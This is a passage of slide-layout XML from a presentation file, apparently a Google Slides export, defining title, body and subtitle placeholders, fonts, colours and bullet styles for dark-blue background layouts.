      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62" name="Google Shape;62;p6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="27544"/>
            <a:ext cx="6457200" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Inter ExtraLight"/>
                <a:ea typeface="Inter ExtraLight"/>
                <a:cs typeface="Inter ExtraLight"/>
                <a:sym typeface="Inter ExtraLight"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="63" name="Google Shape;63;p6"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630769" y="758040"/>
            <a:ext cx="8511900" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="21425">
            <a:solidFill>
              <a:srgbClr val="0072CE"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64" name="Google Shape;64;p6"/>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Red Background_Content 1">
  <p:cSld name="TITLE_ONLY_2">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="000D74"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="65" name="Shape 65"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="66" name="Google Shape;66;p7"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="5539" r="5548" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4215131" y="1195595"/>
            <a:ext cx="4105464" cy="3078187"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67" name="Google Shape;67;p7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630769" y="1272825"/>
            <a:ext cx="3206700" cy="462300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="68575" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="68575">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:srgbClr val="B9D8EB"/>
                </a:solidFill>
                <a:latin typeface="Alatsi"/>
                <a:ea typeface="Alatsi"/>
                <a:cs typeface="Alatsi"/>
                <a:sym typeface="Alatsi"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68" name="Google Shape;68;p7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="676894" y="1698131"/>
            <a:ext cx="3340200" cy="2575500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr indent="-311150" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1300"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-298450" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buChar char="o"/>
              <a:defRPr sz="1100">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-292100" lvl="2" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1000"/>
              <a:buChar char="—"/>
              <a:defRPr sz="1000">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="-279400" lvl="3" marL="1828800" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="800"/>
              <a:buChar char="•"/>
              <a:defRPr sz="800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="-279400" lvl="4" marL="2286000" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="800"/>
              <a:buChar char="•"/>
              <a:defRPr sz="800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-311150" lvl="5" marL="2743200" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1300"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-311150" lvl="6" marL="3200400" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1300"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-311150" lvl="7" marL="3657600" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1300"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-311150" lvl="8" marL="4114800" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1300"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69" name="Google Shape;69;p7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4051119" y="4738069"/>
            <a:ext cx="4460700" cy="438000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="68575" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="68575">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70" name="Google Shape;70;p7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="27544"/>
            <a:ext cx="6457200" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Inter ExtraLight"/>
                <a:ea typeface="Inter ExtraLight"/>
                <a:cs typeface="Inter ExtraLight"/>
                <a:sym typeface="Inter ExtraLight"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="71" name="Google Shape;71;p7"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630769" y="758040"/>
            <a:ext cx="8511900" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="21425">
            <a:solidFill>
              <a:srgbClr val="0072CE"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72" name="Google Shape;72;p7"/>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Red Background_Blank">
  <p:cSld name="TITLE_ONLY_1">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="000D74"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="73" name="Shape 73"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74" name="Google Shape;74;p8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1212413" y="1827806"/>
            <a:ext cx="6719100" cy="685500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
